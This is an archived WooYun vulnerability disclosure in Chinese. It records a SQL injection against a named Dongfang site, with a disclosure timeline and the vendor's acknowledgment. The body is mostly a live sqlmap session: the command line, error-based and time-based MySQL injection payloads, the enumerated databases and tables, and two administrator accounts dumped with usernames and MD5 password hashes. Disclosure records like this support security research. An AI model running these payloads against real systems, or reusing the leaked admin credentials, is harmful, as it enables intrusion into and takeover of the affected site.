乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-06: 细节已通知厂商并且等待厂商处理中 2013-11-06: 厂商已经确认,细节仅向厂商公开 2013-11-16: 细节向核心白帽子及相关领域专家公开 2013-11-26: 细节向普通白帽子公开 2013-12-06: 细节向实习白帽子公开 2013-12-21: 细节向公众公开
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.decfc.dongfang.com/media/media_List.php?NID=1&Language=GB" --dbs---Place: GETParameter: NID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: NID=1 AND (SELECT 9454 FROM(SELECT COUNT(*),CONCAT(0x3a76696a3a,(SELECT (CASE WHEN (9454=9454) THEN 1 ELSE 0 END)),0x3a6d77743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Language=GB Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: NID=1 AND SLEEP(5)&Language=GB---available databases [5]:[*] information_schema[*] mysql[*] php_decfinance[*] php_decfinance_new[*] testDatabase: php_decfinance[105 tables]+----------------------+| bulletin_class_gb || bulletin_gb || comment_class_gb || comment_gb || commodity_class_gb || commodity_gb || counter || culture_class_gb || culture_gb || currency_type_gb || dec_oldnews || download_class_gb || download_gb || ent_culture_class_gb || ent_culture_gb || faddress || farea || fbrowser || finance_class_gb || finance_gb || fipone || fiptwo || fmozilla || frefer || fscreen || fsystem || fvisit || fweburl || gb_content_gb || gb_style_gb || group_class_GB || group_class_gb || group_gb || headlines || infolist || information_gb || ipinfo || ipscope || job_class_gb || job_demand_gb || job_exper_gb || job_feelback_gb || job_gb || job_send_gb || link_class_gb || logistics_class_gb || logistics_gb || magazine_class_gb || magazine_gb || mediasound_gb || menu_gb || navigation_gb || news_class_gb || news_feel_back_gb || news_gb || order_info || order_item || order_payment_gb || orders_gb || payment_class_gb || plat_class_gb || plat_gb || policy_class_gb || policy_gb || pro_base_class_gb || pro_base_gb || procure_feel_back_gb || procure_gb || product_class_gb || product_discount_gb || product_gb || project_class_gb || project_gb || recruit_class_gb || recruit_gb || report_gb || second_class_gb || second_gb || server_class_gb || server_gb || societyduty_gb || statday || statmonth || statweek || statyear || sys_admin || sys_levels || tech_class_gb || tech_gb || techinno_class_gb || techinno_gb || technology_class_gb || technology_gb || third_class_gb || third_gb || topic_class_gb || topic_gb || trading_class_gb || trading_gb || users_gb || video_class_gb || video_gb || visitor || voice_class_gb || voice_gb |+----------------------+Database: php_decfinanceTable: sys_admin[5 columns]+------------+--------------+| Column | Type |+------------+--------------+| AdminName | varchar(20) || AdminPwd | varchar(32) || IP | varchar(15) || Level_List | varchar(200) || RealName | varchar(20) |+------------+--------------+Database: php_decfinanceTable: sys_admin[2 entries]+-----+----------------------------------+----------+------------+------------+| IP | AdminPwd | RealName | AdminName | Level_List |+-----+----------------------------------+----------+------------+------------+| ... | b04cd7043863bdd572008e0d28ba4814 | ddd | admindecfc | 01 || ... | b49282adf74297e8e0aac1501119b075 | decfc | decfchgcw | 99 |+-----+----------------------------------+----------+------------+------------+
危害等级:低
漏洞Rank:5
确认时间:2013-11-06 15:48
谢谢通知我们
暂无
